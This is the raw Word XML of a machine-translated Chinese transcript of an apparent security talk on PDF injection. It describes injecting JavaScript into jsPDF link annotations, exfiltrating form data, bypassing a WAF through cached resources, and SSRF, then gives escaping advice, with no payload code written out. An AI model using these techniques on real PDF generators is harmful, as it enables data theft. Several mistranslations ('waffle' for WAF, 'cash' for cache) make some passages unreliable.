        <w:t xml:space="preserve"> 库</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>他们有一个很棒的界面，你可以在这个框里使用 JavaScript，然后生成 PDF 文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>这个盒子在这里</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我们创建一个新的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>jspdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>对象，我们设置字体大小，我们创建一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>注解，该注解允许您指定 x 和 y 坐标以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我们给注释赋予宽度和高度，类型为 URL 上的链接，我们的输入将放在这里。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>此外，还要添加文本，以便该库能够提供支持。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>客户端 JavaScript 和服务器端 JavaScript，因此服务器端代码可以与 Node.js 配合使用。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>客户端功能在浏览器中运行正常，这对于演示来说</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>非常</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>棒。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>所以，我们会注射我在演讲中提到的那种药物。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>这里我们插入一个新的注释，用一个矩形框表示该区域。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我们使用字典键来指定表单按钮，我们使用我们的</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我们注入一段 JavaScript 代码，它会简单地调用弹出框，所以如果我复制这段代码的话……</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t xml:space="preserve">然后，如果我们将其注入到 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t xml:space="preserve"> 属性中</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>[音乐] 所以这是将原始pdf代码注入到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>属性中，所以通常情况下</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>例如，攻击可能发生在 POST 请求中，但为了演示目的，我们假设攻击发生在 POST 请求中。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我将向您展示客户端 JavaScript 的实现方式。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我们已经注入了PDF代码，现在您可以看到整个文档都可以点击了。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>点击它，就会弹出警告框，这就是 PDF 注入的工作原理，所以这可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>适用于您了解结构的非盲人环境。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>无论是在 PDF 文件还是在</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>盲操作</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>情况下，您都会调用提交表单函数将表</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>单发布</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>到某个位置。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>有趣的是，Chrome 现在会显示外部 URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>只允许您调用 JavaScript，或者抱歉，不能调用 JavaScript 来调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>表单提交或用户交互事件，所以这一点需要注意。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>所以，嗯，在测试各种PDF生成软件和测试各种</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我偶然发现一个人力资源应用程序存在PDF上传漏洞。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>有趣的是，我可以使用插入脚本这种绝妙的技术。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>阅读同源资源真的很棒，但是</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>华夫饼屏蔽了pdf用户代理，所以我的攻击没能奏效。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>真是太不幸了，但谢天谢地，我最终找到了解决办法。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>为了绕过这一点，可以使用现金资源，只要资源被缓存即可。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我可以用这种方法读出结果，而不会触发华夫饼，这相当不错。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:lastRenderedPageBreak/>
        <w:t>好的，总结一下，嗯，pdf</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>库应该</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>如果未对包含括号和反斜杠的任何内容进行转义，则需要对 PDF 字符串进行转义。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>如果你输入了字符，你也会遇到麻烦，容易受到PDF注入攻击。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>请使用以下命令</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>确认您</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>的软件不受这些攻击的影响</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>本文中提到的向量，并确认它们均未执行。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>考虑对 PDF 文件中的用户输入内容进行验证，以防止此类攻击。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>所以，我这次的PDF演讲受到了很多人的启发，尤其是……（插入脚本）</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>他的演讲绝对</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>对</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>我的演讲很有启发，他讲到了PDF文件在网络上的混乱使用。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>太棒了，而且具有开创性，嗯，我真的很喜欢，嗯，我对这方面一无所知。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>直到我看了 Albertini 关于如何编写 PDF 的演讲，我才开始了解 PDF。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>那真的很有用，也很容易理解，嗯，他做得太棒了。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>如果没有他们，我就无法完成这次演讲；还有本和科</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>迪</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>，他们给了我灵感。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我根据他们使用pdf的工作提出的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>ssrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>使用 SSRF 攻击，所以我想告诉你什么？</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>抛开这些不相关的讨论，脆弱的库使得用户在 PDF 文件中的输入变得危险，Chrome 和 Acrobat 也存在这个问题。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>启用这些注入，一个链接就可能泄露文件的内容。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>如果您想了解更多信息，可以下载pdf文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>如果您也想了解注射样品，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>请访问</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>我们这里的帖子。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>希望你们喜欢这次演讲，我留出五分钟时间回答问题，谢谢。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C646C9" w14:textId="77777777" w:rsidR="00A24C94" w:rsidRPr="00A24C94" w:rsidRDefault="00A24C94" w:rsidP="00821DF1">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A24C94" w:rsidRPr="00A24C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78E8B" w14:textId="77777777" w:rsidR="00DB5BD1" w:rsidRDefault="00DB5BD1" w:rsidP="00DB5BD1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5ABF20F3" w14:textId="77777777" w:rsidR="00DB5BD1" w:rsidRDefault="00DB5BD1" w:rsidP="00DB5BD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5FB0A" w14:textId="77777777" w:rsidR="00DB5BD1" w:rsidRDefault="00DB5BD1" w:rsidP="00DB5BD1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="06073FDE" w14:textId="77777777" w:rsidR="00DB5BD1" w:rsidRDefault="00DB5BD1" w:rsidP="00DB5BD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B30B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="54A822CE"/>
    <w:lvl w:ilvl="0" w:tplc="6A6E75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39300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DFA"/>
    <w:rsid w:val="00000C40"/>
    <w:rsid w:val="000023AF"/>
    <w:rsid w:val="0001098A"/>
    <w:rsid w:val="0001351A"/>
    <w:rsid w:val="000451C5"/>
    <w:rsid w:val="00066A2F"/>
    <w:rsid w:val="00095EE8"/>
    <w:rsid w:val="000D5DD3"/>
    <w:rsid w:val="001512E3"/>
    <w:rsid w:val="001A4952"/>
    <w:rsid w:val="001B3E70"/>
    <w:rsid w:val="001F0F35"/>
    <w:rsid w:val="001F30BA"/>
    <w:rsid w:val="001F7300"/>
    <w:rsid w:val="00200F4E"/>
    <w:rsid w:val="002562A4"/>
    <w:rsid w:val="002A5729"/>
    <w:rsid w:val="002D43BA"/>
    <w:rsid w:val="002F5FDF"/>
    <w:rsid w:val="00335386"/>
    <w:rsid w:val="00342C79"/>
    <w:rsid w:val="003674C3"/>
    <w:rsid w:val="003B582D"/>
    <w:rsid w:val="004212AE"/>
    <w:rsid w:val="00455314"/>
    <w:rsid w:val="004558DA"/>
    <w:rsid w:val="00493B0D"/>
    <w:rsid w:val="00552F5C"/>
    <w:rsid w:val="00593E6D"/>
    <w:rsid w:val="005C1DDD"/>
    <w:rsid w:val="005D5929"/>
    <w:rsid w:val="006067B3"/>
    <w:rsid w:val="006636C7"/>
    <w:rsid w:val="006A0DB3"/>
    <w:rsid w:val="0070790D"/>
    <w:rsid w:val="00723F6D"/>
    <w:rsid w:val="00727D02"/>
    <w:rsid w:val="007400DD"/>
    <w:rsid w:val="00747F54"/>
    <w:rsid w:val="00747FB4"/>
    <w:rsid w:val="00762837"/>
    <w:rsid w:val="00776A6B"/>
    <w:rsid w:val="007D58E5"/>
    <w:rsid w:val="007E50A5"/>
    <w:rsid w:val="0080128D"/>
    <w:rsid w:val="00804F58"/>
    <w:rsid w:val="00821DF1"/>
    <w:rsid w:val="0082371F"/>
    <w:rsid w:val="00870DD3"/>
    <w:rsid w:val="00880E3D"/>
    <w:rsid w:val="008A48E6"/>
    <w:rsid w:val="00923C0A"/>
    <w:rsid w:val="00976019"/>
    <w:rsid w:val="009912C5"/>
    <w:rsid w:val="009F46B3"/>
    <w:rsid w:val="009F49E7"/>
    <w:rsid w:val="009F55E8"/>
    <w:rsid w:val="00A24C94"/>
    <w:rsid w:val="00A3609B"/>
    <w:rsid w:val="00A52EAC"/>
    <w:rsid w:val="00A70A78"/>
    <w:rsid w:val="00AA27DC"/>
    <w:rsid w:val="00AD7755"/>
    <w:rsid w:val="00B25BFF"/>
    <w:rsid w:val="00B54713"/>
    <w:rsid w:val="00B65669"/>
    <w:rsid w:val="00BC4F9A"/>
    <w:rsid w:val="00C057DA"/>
    <w:rsid w:val="00C16C78"/>
    <w:rsid w:val="00CB1A13"/>
    <w:rsid w:val="00D20A53"/>
    <w:rsid w:val="00D3013F"/>
    <w:rsid w:val="00D53B40"/>
    <w:rsid w:val="00D60E5E"/>
    <w:rsid w:val="00D87DFA"/>
    <w:rsid w:val="00DB5BD1"/>
    <w:rsid w:val="00DC16F5"/>
    <w:rsid w:val="00E35473"/>
    <w:rsid w:val="00EC35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15DC24"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{932FE733-E986-47FF-A103-2865C00C3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7D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87D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87D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87D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87DF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87DF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87DF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7DF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87DF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7D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87D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87D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87DFA"/>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="标题 5 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00D87DFA"/>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="60">
    <w:name w:val="标题 6 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00D87DFA"/>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="70">
    <w:name w:val="标题 7 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00D87DFA"/>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="80">
    <w:name w:val="标题 8 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00D87DFA"/>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="90">
    <w:name w:val="标题 9 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00D87DFA"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00D87D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7D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7D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7D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7DFA"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a8">
    <w:name w:val="引用 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00D87DFA"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00D87DFA"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00D87DFA"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="ac"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00D87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87DFA"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ad">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00D87DFA"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="ae">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00762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DB5BD1"/>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DB5BD1"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af1">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af2"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DB5BD1"/>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DB5B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5786</Words>
  <Characters>7524</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>313</Lines>
  <Paragraphs>104</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>13206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健豪 卢</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>健豪 卢</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-16T17:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-16T17:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>